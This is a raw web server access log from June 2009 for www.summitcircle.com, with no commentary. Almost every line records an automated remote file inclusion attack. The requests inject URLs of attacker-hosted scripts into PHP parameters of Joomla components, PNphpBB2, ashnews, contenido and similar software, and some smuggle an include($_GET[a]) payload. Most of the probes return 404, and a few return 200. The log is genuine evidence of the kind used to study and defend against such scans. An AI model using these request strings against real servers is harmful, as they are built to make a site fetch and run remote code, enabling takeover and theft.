59.125.5.1 - - [29/Jun/2009:00:44:50 -0700] "GET /includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
210.4.77.148 - - [29/Jun/2009:00:45:23 -0700] "GET /logs/access_090119.log/index.php?loc=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [29/Jun/2009:00:45:47 -0700] "GET /logs/access_090119.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [29/Jun/2009:00:45:47 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [29/Jun/2009:00:45:48 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [29/Jun/2009:00:45:51 -0700] "GET /logs/access_090119.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [29/Jun/2009:00:45:51 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [29/Jun/2009:00:45:52 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.98.209.71 - - [29/Jun/2009:00:46:41 -0700] "GET /index.php?loc=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.98.209.71 - - [29/Jun/2009:00:46:41 -0700] "GET /logs/index.php?loc=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.98.209.71 - - [29/Jun/2009:00:46:41 -0700] "GET /logs/access_090406.log/index.php?loc=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.98.209.71 - - [29/Jun/2009:00:46:50 -0700] "GET /logs/access_090119.log/index.php?loc=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [29/Jun/2009:00:47:26 -0700] "GET /logs/access_090104.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
61.100.5.136 - - [29/Jun/2009:00:47:32 -0700] "GET /logs/access_090119.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [29/Jun/2009:00:47:33 -0700] "GET /logs/access_090104.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
91.198.32.3 - - [29/Jun/2009:00:55:49 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
91.198.32.3 - - [29/Jun/2009:00:55:49 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
91.198.32.3 - - [29/Jun/2009:00:55:49 -0700] "GET /logs/access_090119.log/components/com_forum/download.php?phpbb_root_path=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.68.2.99 - - [29/Jun/2009:00:56:12 -0700] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.68.2.99 - - [29/Jun/2009:00:56:12 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 781 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.68.2.99 - - [29/Jun/2009:00:56:12 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 5808 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.186.128.233 - - [29/Jun/2009:00:56:33 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
64.186.128.233 - - [29/Jun/2009:00:56:33 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
64.186.128.233 - - [29/Jun/2009:00:56:33 -0700] "GET /logs/access_081201.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
64.186.128.233 - - [29/Jun/2009:00:56:42 -0700] "GET /logs/access_090118.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
209.68.2.99 - - [29/Jun/2009:00:56:51 -0700] "GET /logs/access_090104.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.68.2.99 - - [29/Jun/2009:00:56:51 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 781 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.68.2.99 - - [29/Jun/2009:00:56:51 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 5808 "-" "libwww-perl/5.805" "www.summitcircle.com"
222.162.115.67 - - [29/Jun/2009:00:57:30 -0700] "GET /logs/access_090119.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [29/Jun/2009:00:57:32 -0700] "GET /logs/access_090119.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
209.68.2.99 - - [29/Jun/2009:00:57:53 -0700] "GET /logs/access_090119.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.186.128.233 - - [29/Jun/2009:00:59:13 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
64.186.128.233 - - [29/Jun/2009:00:59:17 -0700] "GET /logs/access_090209.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
64.186.128.233 - - [29/Jun/2009:00:59:17 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
87.16.83.70 - - [29/Jun/2009:00:59:59 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
87.16.83.70 - - [29/Jun/2009:00:59:59 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
87.16.83.70 - - [29/Jun/2009:00:59:59 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
209.68.2.99 - - [29/Jun/2009:01:00:33 -0700] "GET /logs/access_090222.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.68.2.99 - - [29/Jun/2009:01:00:33 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 781 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.68.2.99 - - [29/Jun/2009:01:00:33 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 5808 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.68.2.99 - - [29/Jun/2009:01:00:40 -0700] "GET /logs/access_090118.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.186.128.233 - - [29/Jun/2009:01:01:07 -0700] "GET /logs/access_090118.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
64.186.128.233 - - [29/Jun/2009:01:01:11 -0700] "GET /logs/access_081201.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
87.16.83.70 - - [29/Jun/2009:01:01:23 -0700] "GET /logs/access_081201.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
64.186.128.233 - - [29/Jun/2009:01:02:23 -0700] "GET /logs/access_090209.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
87.16.83.70 - - [29/Jun/2009:01:03:17 -0700] "GET /logs/access.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
210.4.77.148 - - [29/Jun/2009:01:03:24 -0700] "GET /index.php?loc=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
210.4.77.148 - - [29/Jun/2009:01:03:24 -0700] "GET /logs/access_090406.log/index.php?loc=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
210.4.77.148 - - [29/Jun/2009:01:03:24 -0700] "GET /logs/index.php?loc=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
87.16.83.70 - - [29/Jun/2009:01:03:39 -0700] "GET /logs/access_081201.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
64.186.128.233 - - [29/Jun/2009:01:03:47 -0700] "GET /logs/access_090104.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
210.4.77.148 - - [29/Jun/2009:01:03:48 -0700] "GET /logs/access_090119.log/index.php?loc=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
59.125.5.1 - - [29/Jun/2009:01:04:15 -0700] "GET /logs/access_090413.log/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [29/Jun/2009:01:04:54 -0700] "GET /logs/access_090413.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:20 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:20 -0700] "GET /logs/access_090119.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:20 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:26 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:26 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:26 -0700] "GET /logs/access_090119.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [29/Jun/2009:01:06:32 -0700] "GET /logs/access_090413.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:32 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:32 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:32 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:32 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:32 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:33 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:34 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:35 -0700] "GET /logs/access.log%20%20//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:35 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:35 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:35 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:35 -0700] "GET /logs/access.log%20%20//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:35 -0700] "GET /logs/access_081201.log%20%20//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:36 -0700] "GET /logs/access_081201.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:36 -0700] "GET /logs/access_081201.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:37 -0700] "GET /logs/access_081201.log%20%20//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [29/Jun/2009:01:06:38 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [29/Jun/2009:01:06:38 -0700] "GET /logs/access_081201.log%20%20//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [29/Jun/2009:01:06:38 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [29/Jun/2009:01:06:38 -0700] "GET /logs/access.log%20%20//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:39 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:39 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:39 -0700] "GET /logs/access_090222.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:39 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:40 -0700] "GET /logs/access_081201.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [29/Jun/2009:01:06:41 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [29/Jun/2009:01:06:41 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [29/Jun/2009:01:06:41 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [29/Jun/2009:01:06:41 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [29/Jun/2009:01:06:41 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:41 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
64.186.128.233 - - [29/Jun/2009:01:06:42 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:42 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [29/Jun/2009:01:06:42 -0700] "GET /logs/access.log%20%20//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [29/Jun/2009:01:06:42 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [29/Jun/2009:01:06:42 -0700] "GET /logs/access_081201.log%20%20//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [29/Jun/2009:01:06:42 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [29/Jun/2009:01:06:42 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [29/Jun/2009:01:06:43 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [29/Jun/2009:01:06:43 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [29/Jun/2009:01:06:43 -0700] "GET /logs/access_090119.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:43 -0700] "GET /logs/access.log%20%20//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:43 -0700] "GET /logs/access_081201.log%20%20//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [29/Jun/2009:01:06:44 -0700] "GET /logs/access_090119.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [29/Jun/2009:01:06:44 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [29/Jun/2009:01:06:44 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [29/Jun/2009:01:06:47 -0700] "GET /logs/access_081201.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:51 -0700] "GET /ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:51 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:51 -0700] "GET /logs/access_090222.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [29/Jun/2009:01:06:51 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [29/Jun/2009:01:06:56 -0700] "GET /logs/access_081201.log//ashnews.php?pathtoashnews=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
